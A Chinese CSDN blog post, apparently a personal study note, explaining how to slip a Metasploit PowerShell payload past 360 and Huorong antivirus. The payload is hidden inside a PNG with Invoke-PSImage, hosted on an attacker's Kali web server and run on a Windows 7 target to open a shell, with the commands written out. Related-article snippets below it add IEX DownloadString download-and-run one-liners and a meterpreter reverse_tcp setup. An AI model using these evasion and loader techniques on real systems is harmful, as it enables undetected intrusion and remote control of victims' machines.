powershell免杀学习:过360、火绒

最新推荐文章于 2023-01-12 11:30:52 发布
最新推荐文章于 2023-01-12 11:30:52 发布
阅读量8.9k 收藏 16
点赞数 5
分类专栏: 学习日常
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/109863610
版权

首先先通过msfvenon生成一个ps1脚本
在这里插入图片描述

使用到的脚本项目地址:
https://github.com/peewpw/Invoke-PSImage

自己准备一张jpg图片
在这里插入图片描述

powershell默认是不允许加载外部脚本文件的,所以在打开powershell时需要用executionpolicy bypass参数来绕过策略的限制;然后import-module来导入invoke-psimage.ps1脚本; 利用工具通过powershell将生成的ps1脚本与test.jpg合成为shell.png; 原理是将脚本中的字节数据存储到图片中,而图片的每一个像素都会存一个字节,所以图片像素尽量大一点。

Powershell -ExecutionPolicy Bypass
Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -Script .\payload.ps1 -Image .\test.jpg -Out shell.png -Web

在这里插入图片描述

将脚本生成的内容复制出来,然后将生成的shell.png放到自己的kali上,并开启web服务,保证能够访问到
在这里插入图片描述

将访问地址http://192.200.30.57:8000/shell.png替换到脚本生成的内容中去
在这里插入图片描述

接着在kali MSF开启监听 在这里插入图片描述

然后将这一段发给目标win7运行
在这里插入图片描述

运行powshell执行(同时开启360杀毒和火绒),照样可以获得shell,过程中没有报毒
在这里插入图片描述

在这里插入图片描述

火绒测试通过
在这里插入图片描述

在这里插入图片描述

keepb1ue
关注
  • 5
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
结合使用powershell绕过360
CODING...
02-27 4429
1.使用web_delivery模块: 使用kali的msf中的exploit/multi/script/web_delivery 选择target,这里要用powershell 然后设置payload,还是选择最爱的windows/meterpreter/reverse_tcp 设置相应的参数 然后exploit,得到一段在受害机上执行的shell代码,然后利用
powershell命令语句混淆免杀(bypass火绒
weixin_43899495的博客
02-04 1263
基础混淆 原始语句(不免杀powershell “IEX (New-Object System.Net.WebClient).DownloadString(‘http://127.0.0.1/a.ps1’)" AV:火绒 混淆测试 New-Object System.Net 类可以直接替换成 New-Object Net 类(不免杀powershell "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/a.ps1')"
利用powershell安装360杀毒
weixin_44337289的博客
12-26 177
如果这两种都没有出现,也可在桌面按住shift键,然后鼠标右键单击,这个时候可能直接出现进入powershell的选项,但是如果你的系统稍微旧一点,只会出现进入cmd的选项,这个时候进入cmd然后输入powershell可以暂时使用powershell360杀毒是360公司出品的一款杀毒软件,免费的,据说该产品破坏了付费杀毒这个行当。服务器单单只有一个系统的时候,由于IE的严格保护,有些电脑可能无法下载文件,所以用powershell命令栏下载不失为一种选择。
编写绕过360安全卫士自启动项 - 黑白网络
04-12
编写绕过360安全卫士自启动项 - 黑白网络
bypass-clm:PowerShell受限语言模式绕过
05-24
PowerShell受限语言模式绕过 这将生成一个可执行文件,即使启用了约束语言模式,该可执行文件也会执行完整语言模式powershell会话。 在撰写本文时,我发现的唯一绕过方法是降级为PowerShell版本2或使用.Net中的运行空间。 PowerShell版本2现在不再普遍可用,并且Runspaces本身不提供交互式界面。 该方法将提供完整的powershell会话,就像运行powershell.exe ,但始终处于完全语言模式。 这是通过执行以下操作来完成的: 我们在System.Management.Automation反射性地加载内部SystemPolicy类 我们确保静态方法GetSystemLockdownPolicy已由JIT引擎编译。 我们检索已编译方法的函数指针。 我们利用VirtualProtect来确保功能代码可写。 我们用存根xor rax,rax;
PowerShell中的C#:如何添加多个ReferenceAssemblies
04-07
我不知道这样的命名空间。 事情是这样的:Power Shell是解释系统; 并且您需要加载一些默认情况下未加载的其他程序集。 作为解释系统中的所有内容,都需要在“运行时”动态地加载它。 如何? 我将演示如何加载...
PowerShell启用winrm失败:拒绝访问 0x80070005 -2147024891
01-20
PowerShell远程管理很强大,开启远程访问本来一行命令即可,但不是永远都顺风顺水。今天就分享一些网友们的总结,真心希望某条可解燃眉之急。 声明:以下内容来自QQ群友集体智慧,由老传整理。 启用winrm失败,报...
powershell-foldersize:使用powershell找出文件夹大小的脚本
06-27
powershell 文件夹大小 使用 powershell 找出 Windows 中文件夹的大小。 说明 将脚本保存在一个文件夹中。 在powershell中运行它。 它显示与脚本相同路径下的每个文件夹的大小。
tesma-powershell:TESMA:registered:PowerShell示例
03-02
通过深入研究“tesma-powershell-master”中的示例,不仅可以掌握PowerShell的基本用法,还能学习到如何将其应用到TESMA的特定场景中,从而提升系统管理的专业技能。同时,这也是一个很好的机会,学习如何将开源项目...
PowerShell-Misc:其他PowerShell
04-08
2. **PowerShell脚本编写**:学习编写PowerShell脚本,包括如何定义变量、条件语句(如`if`、`else`)、循环(如`foreach`、`while`)、函数以及错误处理。了解脚本的执行策略和权限设置。 3. **对象和数据类型**:...
Powershell-Modules:Powershell模块
04-27
PowerShell模块是Windows PowerShell环境中的一个核心特性,它允许开发者和管理员将相关的命令、脚本和函数组织在一起,形成可重用的单元,方便管理和执行。PowerShell模块为提高脚本编写效率、代码复用以及模块化...
CS木马免杀技巧分享.pdf
08-11
01Shellcode加载器 02 Powershell免杀 03 利用场景介绍
PowershellTools:Powershell 工具和 snipets
06-17
通过`PowershellTools-master`,你可能能学习到一些最佳实践示例。 5. **PowerShell调试**: `PowershellTools-master`可能包含一些关于如何调试PowerShell脚本的工具或技巧。PowerShell支持断点、StepInto、Step...
PowerShell-EWS脚本:使用EWS对Exchange邮箱执行操作的PowerShell脚本的集合
02-08
PowerShell EWS脚本 使用EWS对Exchange邮箱执行操作的PowerShell脚本的集合
Random-PowerShell-Work:随机PowerShell工作
04-29
随机PowerShell工作 如果您对我的脚本有所帮助,请给我几美元。 这是我多年来编写的PowerShell脚本的集合。 如果您想了解更多PowerShell方面的功能,请查看我在博客。 这是我撰写的有关自动化,大量PowerShell的...
PowerShell木马免杀利器: Invoke-Obfuscation(过火绒)
xf555er的博客
01-07 2281
Invoke-Obfuscation工具下载地址: https://github.com/danielbohannon/Invoke-ObfuscationInvoke-Obfuscation是一款PowerShell混淆工具,可以将PowerShell脚本加密,使得它的检测和分析变得更加困难。该工具包含多种加密方法,可以单独使用也可以结合使用,以提高混淆的效果。
免杀学习(三)powershell
最新发布
m0_62207170的博客
01-12 618
powershell免杀
powershell免杀思路分析(过某60和某绒)
技术超强的网络安全平台
05-07 2276
文章首发于:https://forum.butian.net/share/936 写在前面 powershell做为微软windows系统自带的软件包,具有十分强大的功能,Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的功能,在IT/系统管理员间得到普及。总的特点来说就是:方便、有效和隐蔽。举例来说,利用这些合法工具可以让威胁活动混在正常的网络流量或IT/系统管理工作内,也让这些恶意威胁能够留下较少的痕迹,使得侦测更加困难
Powershell免杀系列(二)
st3pby的博客
02-20 3229
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。 正文 powershell免杀⽅法有很多,对代码进⾏编码是最常⻅的⼀种,这⾥介绍⼀个专⻔⽤来对powershell进⾏编码免杀的框架Invoke-Obfuscation,这也是著名的APT32组织海莲花常⽤的⼀个⼯具。 该工具可以对powershell代码进行 ASCII/hex/octal/binary/SecureS...
Cobalt Strike免杀:利用Powershell隐蔽上线
"Cobalt Strike beacon 免杀上线方法通过 Powershell" 本文将介绍如何使用 Cobalt Strike 创建一个免杀PowerShell payload 并在目标环境中隐蔽上线。Cobalt Strike 是一款广泛用于红队操作和渗透测试的安全工具...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值